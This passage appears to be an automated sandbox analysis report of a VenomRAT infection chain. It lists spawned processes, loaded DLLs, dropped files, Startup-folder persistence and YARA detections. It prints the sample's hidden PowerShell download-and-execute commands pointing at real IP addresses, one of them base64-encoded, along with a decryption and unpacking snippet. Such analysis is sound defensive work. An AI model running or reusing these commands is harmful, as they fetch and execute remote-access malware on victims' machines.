Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: aclui.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Windows\Temp\Package.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: C:\Windows\Temp\Package.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\Package.exe

Window detected: Number of UI elements: 24

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Users\Administrator\source\repos\Project9\Release\Project9.pdb source: Package.exe, 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmp, iviewers.dll.3.dr
Source:	Binary string: OLEView.pdb source: powershell.exe, 00000003.00000002.2177596881.00000169B176B000.00000004.00000800.00020000.00000000.sdmp, Package.exe, Package.exe, 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Package.exe.3.dr
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.pdb source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($J3Vpk) $qW3iC = [Convert]::FromBase64String($fTMhG) $iAdZA = [Convert]::FromBase64String($OSgCW) $8yrmU = [System.Security.Cryptography.Aes]::Create() $8yrmU.Key = $AohO0

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"			Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D2B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,

5_2_00D2B905

Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D3F3B0 push ecx; ret	5_2_00D3F3C3
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D3FDDD push ecx; ret	5_2_00D3FDF0
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_6E2FE864 push ecx; ret	5_2_6E2FE877

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\iviewers.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\Package.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\iviewers.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\Package.exe			Jump to dropped file

Boot Survival

Yara detected VenomRAT

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
